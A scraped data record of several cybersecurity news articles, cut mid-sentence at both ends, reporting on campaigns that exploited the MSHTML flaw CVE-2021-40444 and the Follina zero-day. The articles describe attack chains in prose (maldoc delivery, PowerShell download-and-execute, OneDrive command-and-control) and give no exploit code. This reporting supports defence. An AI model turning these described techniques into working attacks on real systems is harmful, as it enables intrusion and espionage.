RTF documents contain an exploit for the widely abused MSHTML remote code execution vulnerability ([CVE-2021-40444](<https://thehackernews.com/2022/01/hackers-exploited-mshtml-flaw-to-spy-on.html>)), leading to the execution of a JavaScript code that spawns a PowerShell command to download and execute a Cobalt Strike beacon retrieved from a remote server.\n\nAnother cluster of activity potentially relates to a Russian threat actor tracked as Carbon Spider (aka [FIN7](<https://thehackernews.com/2021/10/hackers-set-up-fake-company-to-get-it.html>)), which has employed a similar maldocs-oriented attack vector that's engineered to drop a PowerShell-based backdoor capable of fetching and running a next-stage executable.\n\nMalwarebytes also said it has detected a \"significant uptick in malware families being used with the intent of stealing information or otherwise gaining access in Ukraine,\" including [Hacktool.LOIC](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=HackTool%3AWin32%2FOylecann.A>), [Ainslot Worm](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Worm:Win32/Ainslot.A!reg>), FFDroider, [Formbook](<https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook>), [Remcos](<https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos>), and [Quasar RAT](<https://lab52.io/blog/another-cyber-espionage-campaign-in-the-russia-ukrainian-ongoing-cyber-attacks/>).\n\n\"While these families are all relatively common in the cybersecurity world, the fact that we witnessed spikes almost exactly when Russian troops crossed the Ukrainian border makes these developments interesting and unusual,\" Adam Kujawa, director of Malwarebytes Labs, said in a statement shared with The Hacker News.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-31T13:02:00", "type": "thn", "title": "Hackers Increasingly Using 'Browser-in-the-Browser' Technique in Ukraine Related Attacks", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-05-05T02:23:33", "id": "THN:4E80D9371FAC9B29044F9D8F732A3AD5", "href": "https://thehackernews.com/2022/03/hackers-increasingly-using-browser-in.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:47", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEgA-QKrMYatN3F_M4-v7x9HM6nvdPD1OS7NKKkIRgnsnSvlLAXRgr6hsKEZ00atwgnoL5cprjlDTBz9OCZqP7C83Y62uK7Zhq5VsgW8BYehEgXjsimQXbNn7rdTOaC96Glv7wizMuFukmGaa6Uo3KZH5Wejk3G_0r9eLqZqjNOspdt5uUMkJ6gyxsw8>)\n\nA short-lived phishing campaign has been observed taking advantage of a novel exploit that bypassed a patch put in place by Microsoft to fix a remote code execution vulnerability affecting the MSHTML component with the goal of delivering Formbook malware.\n\n\"The attachments represent an escalation of the attacker's abuse of the CVE-2021-40444 bug and demonstrate that even a patch can't always mitigate the actions of a motivated and sufficiently skilled attacker,\" SophosLabs researchers Andrew Brandt and Stephen Ormandy [said](<https://news.sophos.com/en-us/2021/12/21/attackers-test-cab-less-40444-exploit-in-a-dry-run/>) in a new report published Tuesday.\n\n[CVE-2021-40444](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444>) (CVSS score: 8.8) relates to a remote code execution flaw in MSHTML that could be exploited using specially crafted Microsoft Office documents. Although Microsoft addressed the security weakness as part of its September 2021 [Patch Tuesday updates](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>), it has been put to use in [multiple attacks](<https://thehackernews.com/2021/09/new-0-day-attack-targeting-windows.html>) ever since details pertaining to the flaw became public.\n\nThat same month, the technology giant [uncovered](<https://thehackernews.com/2021/09/windows-mshtml-0-day-exploited-to.html>) a targeted phishing campaign that leveraged the vulnerability to deploy Cobalt Strike Beacons on compromised Windows systems. Then in November, SafeBreach Labs [reported](<https://thehackernews.com/2021/11/hackers-using-microsoft-mshtml-flaw-to.html>) details of an Iranian threat actor operation that targeted Farsi-speaking victims with a new PowerShell-based information stealer designed to gather sensitive information.\n\nThe new campaign discovered by Sophos aims to get around the patch's protection by morphing a publicly available [proof-of-concept Office exploit](<https://github.com/Edubr2020/CVE-2021-40444--CABless/blob/main/MS_Windows_CVE-2021-40444%20-%20'Ext2Prot'%20Vulnerability%20'CABless'%20version.pdf>) and weaponizing it to distribute Formbook malware. The cybersecurity firm said the success of the attack can, in part, be attributed to a \"too-narrowly focused patch.\"\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEgASEZ8KvlSBJz1x7Q76isjFrCp75Cd_9NaVZvtMfqRufKRIArSQn1kxLXk86-Tc0o12JfC_n6X-nPIvoEO3JsIgDQ7_PAcEYpeiqvhKofLuQ_e7qZik3FJ-7KTq5CGjh3R7RDATGz4b_HmeYkqXa4dKpvAvSXu-47iGQrPd2IjnRxR4klHyplckGLB>)\n\n\"In the initial versions of CVE-2021-40444 exploits, [the] malicious Office document retrieved a malware payload packaged into a Microsoft Cabinet (or .CAB) file,\" the researchers explained. \"When Microsoft's patch closed that loophole, attackers discovered they could use a different attack chain altogether by enclosing the maldoc in a specially crafted RAR archive.\"\n\n**CAB-less 40444**, as the modified exploit is called, lasted for 36 hours between October 24 and 25, during which spam emails containing a malformed RAR archive file were sent to potential victims. The RAR file, in turn, included a script written in Windows Script Host ([WSH](<https://en.wikipedia.org/wiki/Windows_Script_Host>)) and a Word Document that, upon opening, contacted a remote server hosting malicious JavaScript.\n\nConsequently, the JavaScript code utilized the Word Document as a conduit to launch the WSH script and execute an embedded PowerShell command in the RAR file to retrieve the [Formbook](<https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook>) malware payload from an attacker-controlled website.\n\nAs for why the exploit disappeared a little over a day in use, clues lie in the fact that the modified RAR archive files wouldn't work with older versions of the WinRAR utility. \"So, unexpectedly, in this case, users of the much older, outdated version of WinRAR would have been better protected than users of the latest release,\" the researchers said.\n\n\"This research is a reminder that patching alone cannot protect against all vulnerabilities in all cases,\" SophosLabs Principal Researcher Andrew Brandt said. \"Setting restrictions that prevent a user from accidentally triggering a malicious document helps, but people can still be lured into clicking the 'enable content' button.\"\n\n\"It is therefore vitally important to educate employees and remind them to be suspicious of emailed documents, especially when they arrive in unusual or unfamiliar compressed file formats from people or companies they don't know,\" Brandt added. When reached for a response, a Microsoft spokesperson said \"we are investigating these reports and will take appropriate action as needed to help keep customers protected.\"\n\n**_Update:_** Microsoft told The Hacker News that the aforementioned exploit was indeed addressed with security updates that were released in September 2021. Sophos now notes that the CAB-less 40444 exploit \"may have evaded mitigations of CVE-2021-40444 without the September patch focused on the CAB-style attack\" and that the patch blocks the malicious behavior.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-12-22T07:45:00", "type": "thn", "title": "New Exploit Lets Malware Attackers Bypass Patch for Critical Microsoft MSHTML Flaw", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-29T03:33:40", "id": "THN:8A60310AB796B7372A105B7C8811306B", "href": "https://thehackernews.com/2021/12/new-exploit-lets-malware-attackers.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-02T06:04:33", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgRdLCnYaPXc_hVvRWhZ1nKYDtBRo6rwk1xGSO3wDrqcJ04igkpjKQyuyHKgmgeHL6GS7XLJjB6WCffBWb-ntXiCGFrcggxS3t1sQxo2LiuX7WI9F-gwW3tPRARSzEWceyzsLgu1VSyZndaF36ZhDlzpBRvkHLp7Ao_zaUYJmthkY4IZN4znwcyRdpY/s728-e100/hacking.jpg>)\n\nThe Russian state-sponsored threat actor known as [APT28](<https://thehackernews.com/2022/09/researchers-identify-3-hacktivist.html>) has been found leveraging a new code execution method that makes use of mouse movement in decoy Microsoft PowerPoint documents to deploy malware.\n\nThe technique \"is designed to be triggered when the user starts the presentation mode and moves the mouse,\" cybersecurity firm Cluster25 [said](<https://blog.cluster25.duskrise.com/2022/09/23/in-the-footsteps-of-the-fancy-bear-powerpoint-graphite/>) in a technical report. \"The code execution runs a PowerShell script that downloads and executes a dropper from OneDrive.\"\n\nThe dropper, a seemingly harmless image file, functions as a pathway for a follow-on payload, a variant of a malware known as Graphite, which uses the Microsoft Graph API and OneDrive for command-and-control (C2) communications to retrieve additional payloads.\n\nThe attack employs a lure document that makes use of a template potentially linked to the Organisation for Economic Co-operation and Development ([OECD](<https://en.wikipedia.org/wiki/OECD>)), a Paris-based intergovernmental entity.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjM4urmpBb2OaNLBBurEzXMWD5Gc0bF0d-1A8k55IscX0Hlkq-v1VQ39Xj9y7iwnPFlRBxvY1w6ZlUWb5dYTHpIwA3gVd7mcXXY64dImoNQO7bXe84Wez6JCWTlrdS77BnSIF6DllbmNoGykj67hPrGivBZDqdvzOgXckRo6adoi5bgIMpmnmWEI4_Y/s728-e100/ppt.jpg>)\n\nCluster25 noted the attacks may be ongoing, considering that the URLs used in the attacks appeared active in August and September, although the hackers had previously laid the groundwork for the campaign between January and February.\n\nPotential targets of the operation likely include entities and individuals operating in the defense and government sectors of Europe and Eastern Europe, the company added, citing an analysis of geopolitical objectives and the gathered artifacts.\n\nThis is not the first time the adversarial collective has deployed Graphite. In January 2022, Trellix [disclosed](<https://thehackernews.com/2022/01/hackers-exploited-mshtml-flaw-to-spy-on.html>) a similar attack chain that exploited the MSHTML remote code execution vulnerability ([CVE-2021-40444](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>)) to drop the backdoor.\n\nThe development is a sign that APT28 (aka Fancy Bear) continues to hone its technical tradecraft and evolve its methods for maximum impact as exploitation routes once deemed viable (e.g., macros) cease to be profitable.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-09-28T10:09:00", "type": "thn", "title": "Hackers Using PowerPoint Mouseover Trick to Infect Systems with Malware", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-10-02T05:18:39", "id": "THN:B399D1943153CEEF405B85D4310C2142", "href": "https://thehackernews.com/2022/09/hackers-using-powerpoint-mouseover.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:18", "description": "[](<https://thehackernews.com/images/-3vEprTVA4BI/YULvTEzYNCI/AAAAAAAADz0/RpSk1fU9GbcY7e98Gg2r8aBRvy73Z52kACLcBGAsYHQ/s0/cyberattack.jpg>)\n\nMicrosoft on Wednesday disclosed details of a targeted phishing campaign that leveraged a now-patched zero-day flaw in its MSHTML platform using specially-crafted Office documents to deploy Cobalt Strike Beacon on compromised Windows systems.\n\n\"These attacks used the vulnerability, tracked as [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444>), as part of an initial access campaign that distributed custom Cobalt Strike Beacon loaders,\" Microsoft Threat Intelligence Center [said](<https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/>) in a technical write-up. \"These loaders communicated with an infrastructure that Microsoft associates with multiple cybercriminal campaigns, including human-operated ransomware.\"\n\nDetails about CVE-2021-40444 (CVSS score: 8.8) first [emerged](<https://thehackernews.com/2021/09/new-0-day-attack-targeting-windows.html>) on September 7 after researchers from EXPMON alerted the Windows maker about a \"highly sophisticated zero-day attack\" aimed at Microsoft Office users by taking advantage of a remote code execution vulnerability in MSHTML (aka Trident), a proprietary browser engine for the now-discontinued Internet Explorer and which is used in Office to render web content inside Word, Excel, and PowerPoint documents.\n\n\"The observed attack vector relies on a malicious ActiveX control that could be loaded by the browser rendering engine using a malicious Office document,\" the researchers noted. Microsoft has since [rolled out a fix](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>) for the vulnerability as part of its Patch Tuesday updates a week later on September 14.\n\nThe Redmond-based tech giant attributed the activities to related cybercriminal clusters it tracks as DEV-0413 and DEV-0365, the latter of which is the company's moniker for the emerging threat group associated with creating and managing the Cobalt Strike infrastructure used in the attacks. The earliest exploitation attempt by DEV-0413 dates back to August 18.\n\nThe exploit delivery mechanism originates from emails impersonating contracts and legal agreements hosted on file-sharing sites. Opening the malware-laced document leads to the download of a Cabinet archive file containing a DLL bearing an INF file extension that, when decompressed, leads to the execution of a function within that DLL. The DLL, in turn, retrieves remotely hosted shellcode \u2014 a custom Cobalt Strike Beacon loader \u2014 and loads it into the Microsoft address import tool.\n\nAdditionally, Microsoft said some of the infrastructures that were used by DEV-0413 to host the malicious artifacts were also involved in the delivery of BazaLoader and Trickbot payloads, a separate set of activities the company monitors under the codename DEV-0193 (and by Mandiant as UNC1878).\n\n\"At least one organization that was successfully compromised by DEV-0413 in their August campaign was previously compromised by a wave of similarly-themed malware that interacted with DEV-0365 infrastructure almost two months before the CVE-2021-40444 attack,\" the researchers said. \"It is currently not known whether the retargeting of this organization was intentional, but it reinforces the connection between DEV-0413 and DEV-0365 beyond sharing of infrastructure.\"\n\nIn an independent investigation, Microsoft's RiskIQ subsidiary attributed the attacks with high confidence to a ransomware syndicate known as Wizard Spider aka Ryuk, noting that the network infrastructure employed to provide command-and-control to the Cobalt Strike Beacon implants spanned more than 200 active servers.\n\n\"The association of a zero-day exploit with a ransomware group, however remote, is troubling,\" RiskIQ researchers [said](<https://www.riskiq.com/blog/external-threat-management/wizard-spider-windows-0day-exploit/>). It suggests either that turnkey tools like zero-day exploits have found their way into the already robust ransomware-as-a-service (RaaS) ecosystem or that the more operationally sophisticated groups engaged in traditional, government-backed espionage are using criminally controlled infrastructure to misdirect and impede attribution.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-16T07:19:00", "type": "thn", "title": "Windows MSHTML 0-Day Exploited to Deploy Cobalt Strike Beacon in Targeted Attacks", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-11-12T15:17:20", "id": "THN:59AE75C78D4644BFA6AD90225B3DE0C1", "href": "https://thehackernews.com/2021/09/windows-mshtml-0-day-exploited-to.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-30T17:38:47", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgi3RXvGtPoTC8ufDqadLbye4bhkJjWs-Un41xcwOWrqQPpLekG-pG0Xxk-or-GInK-LQOG7QDpCF3p4FVNPMxdNLSsl4TgenAVq4LOJcfYcZ0LcgQ0zlwru8TY2ff5ffd7EEPtwFERwA4hDGj0uKeJYZBw1AGUroAFwL-QXSJrDONv8gHe7E2ghPpr/s728-e100/hacking-code.jpg>)\n\nCybersecurity researchers are calling attention to a zero-day flaw in Microsoft Office that could be abused to achieve arbitrary code execution on affected Windows systems.\n\nThe vulnerability came to light after an independent cybersecurity research team known as nao_sec uncovered a Word document (\"[05-2022-0438.doc](<https://www.virustotal.com/gui/file/4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784/detection>)\") that was uploaded to VirusTotal from an IP address in Belarus.\n\n\"It uses Word's external link to load the HTML and then uses the 'ms-msdt' scheme to execute PowerShell code,\" the researchers [noted](<https://twitter.com/nao_sec/status/1530196847679401984>) in a series of tweets last week.\n\nAccording to security researcher Kevin Beaumont, who dubbed the flaw \"Follina,\" the maldoc leverages Word's [remote template](<https://attack.mitre.org/techniques/T1221/>) feature to fetch an HTML file from a server, which then makes use of the \"ms-msdt://\" URI scheme to run the malicious payload.\n\nThe shortcoming has been so named because the malicious sample references 0438, which is the area code of Follina, a municipality in the Italian city of Treviso.\n\n[MSDT](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msdt>) is short for Microsoft Support Diagnostics Tool, a utility that's used to troubleshoot and collect diagnostic data for analysis by support professionals to resolve a problem.\n\n\"There's a lot going on here, but the first problem is Microsoft Word is executing the code via msdt (a support tool) even if macros are disabled,\" Beaumont [explained](<https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e>).\n\n\"[Protected View](<https://support.microsoft.com/en-us/topic/what-is-protected-view-d6f09ac7-e6b9-4495-8e43-2bbcdbcb6653>) does kick in, although if you change the document to RTF form, it runs without even opening the document (via the preview tab in Explorer) let alone Protected View,\" the researcher added.\n\nIn a standalone analysis, cybersecurity company Huntress Labs detailed the attack flow, noting the HTML file (\"RDF842l.html\") that triggers the exploit originated from a now-unreachable domain named \"xmlformats[.]com.\"\n\n\"A Rich Text Format file (.RTF) could trigger the invocation of this exploit with just the Preview Pane within Windows Explorer,\" Huntress Labs' John Hammond [said](<https://www.huntress.com/blog/microsoft-office-remote-code-execution-follina-msdt-bug>). \"Much like CVE-2021-40444, this extends the severity of this threat by not just 'single-click' to exploit, but potentially with a 'zero-click' trigger.\"\n\nMultiple Microsoft Office versions, including Office, Office 2016, and Office 2021, are said to be affected, although other versions are expected to be vulnerable as well.\n\nWhat's more, Richard Warren of NCC Group [managed](<https://twitter.com/buffaloverflow/status/1530866518279565312>) to demonstrate an exploit on Office Professional Pro with April 2022 patches running on an up-to-date Windows 11 machine with the preview pane enabled.\n\n\"Microsoft are going to need to patch it across all the different product offerings, and security vendors will need robust detection and blocking,\" Beaumont said. We have reached out to Microsoft for comment, and we'll update the story once we hear back.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-30T09:40:00", "type": "thn", "title": "Watch Out! Researchers Spot New Microsoft Office Zero-Day Exploit in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-05-30T15:44:33", "id": "THN:E7762183A6F7B3DDB942D3F1F99748F6", "href": "https://thehackernews.com/2022/05/watch-out-researchers-spot-new.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:39", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEjqkUGrj098m-d_WWiB3rvM91Eu1x3fZweKFwfNSYwVrZToTWUlCh3s3UvHQIXtbPP4vPubJ_dEdC7jSX7gGkeScLCqYsa37Zuw_hFBK6g9FbzvO5nMZPrRUk6fjS1F01cduuDD_mnZ-OKnauen-xJmprSHgWH_jmx8MYUffZvp4uojtUBzm6BbCwIZ>)\n\nCybersecurity researchers on Tuesday took the wraps off a multi-stage espionage campaign targeting high-ranking government officials overseeing national security policy and individuals in the defense industry in Western Asia.\n\nThe attack is unique as it leverages Microsoft OneDrive as a command-and-control (C2) server and is split into as many as six stages to stay as hidden as possible, Trellix \u2014 a new company created following the merger of security firms McAfee Enterprise and FireEye \u2014 said in a [report](<https://www.trellix.com/en-gb/about/newsroom/stories/threat-labs/prime-ministers-office-compromised.html>) shared with The Hacker News.\n\n\"This type of communication allows the malware to go unnoticed in the victims' systems since it will only connect to legitimate Microsoft domains and won't show any suspicious network traffic,\" Trellix explained.\n\nFirst signs of activity associated with the covert operation are said to have commenced as early as June 18, 2021, with two victims reported on September 21 and 29, followed by 17 more in a short span of three days between October 6 and 8.\n\n\"The attack is particularly unique due to the prominence of its victims, the use of a recent [security flaw], and the use of an attack technique that the team had not seen before,\" Christiaan Beek, lead scientist at Trellix, said. \"The objective was clearly espionage.\"\n\nTrellix attributed the sophisticated attacks with moderate confidence to the Russia-based [APT28](<https://malpedia.caad.fkie.fraunhofer.de/actor/sofacy>) group, also tracked under the monikers Sofacy, Strontium, Fancy Bear, and Sednit, based on similarities in the source code as well as in the attack indicators and geopolitical objectives.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEiHATh-_6CXq1DE4gF63tRFptoK4b3k33uBkDfc-JwaJRbLhn0cxU2JHUh5A-0U_AsQ3XgqvcFjPKtR6AVo-_daYwK8-jLWPGzamt2d7MjD1zstHO8IFPqdv3NTZU3GvsI_Wdk9Q7rG6zd84PEcawqbp7bJMrog9xoaUDkiJadygQnO1Wh-qdlH79xN>)\n\n\"We are supremely confident that we are dealing with a very skilled actor based on how infrastructure, malware coding and operation were set up,\" Trellix security researcher Marc Elias said.\n\nThe infection chain begins with the execution of a Microsoft Excel file containing an exploit for the MSHTML remote code execution vulnerability ([CVE-2021-40444](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>)), which is used to run a malicious binary that acts as the downloader for a third-stage malware dubbed Graphite.\n\nThe DLL executable uses OneDrive as the C2 server via the Microsoft Graph API to retrieve additional stager malware that ultimately downloads and executes [Empire](<https://attack.mitre.org/software/S0363/>), an open-source PowerShell-based post-exploitation framework widely abused by threat actors for follow-on activities.\n\n\"Using the Microsoft OneDrive as a command-and-control Server mechanism was a surprise, a novel way of quickly interacting with the infected machines by dragging the encrypted commands into the victim's folders,\" Beek explained. \"Next OneDrive would sync with the victim\u2019s machines and encrypted commands being executed, whereafter the requested info was encrypted and sent back to the OneDrive of the attacker.\"\n\nIf anything, the development marks the continued exploitation of the MSTHML rendering engine flaw, with [Microsoft](<https://thehackernews.com/2021/09/windows-mshtml-0-day-exploited-to.html>) and [SafeBreach Labs](<https://thehackernews.com/2021/11/hackers-using-microsoft-mshtml-flaw-to.html>) disclosing multiple campaigns that have weaponized the vulnerability to plant malware and distribute custom Cobalt Strike Beacon loaders.\n\n\"The main takeaway is to highlight the level of access threat campaigns, and in particular how capable threat actors are able to permeate the most senior levels of government,\" Raj Samani, chief scientist and fellow at Trellix told The Hacker News. \"It is of paramount importance that security practitioners tasked with protecting such high value systems consider additional security measures to prevent, detect and remediate against such hostile actions.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-01-25T14:04:00", "type": "thn", "title": "Hackers Exploited MSHTML Flaw to Spy on Government and Defense Targets", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-01-29T08:06:51", "id": "THN:BD014635C5F702379060A20290985162", "href": "https://thehackernews.com/2022/01/hackers-exploited-mshtml-flaw-to-spy-on.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:18", "description": "[](<https://thehackernews.com/images/-n2LTDkSYrUk/YUF8P0ggXPI/AAAAAAAADzE/Jk_5Hbl3Sf4AUwjPizqDaRZLrxWgrDizgCLcBGAsYHQ/s0/windows-update-download.jpg>)\n\nA day after [Apple](<https://thehackernews.com/2021/09/apple-issues-urgent-updates-to-fix-new.html>) and [Google](<https://thehackernews.com/2021/09/update-google-chrome-to-patch-2-new.html>) rolled out urgent security updates, Microsoft has [pushed software fixes](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Sep>) as part of its monthly Patch Tuesday release cycle to plug 66 security holes affecting Windows and other components such as Azure, Office, BitLocker, and Visual Studio, including an [actively exploited 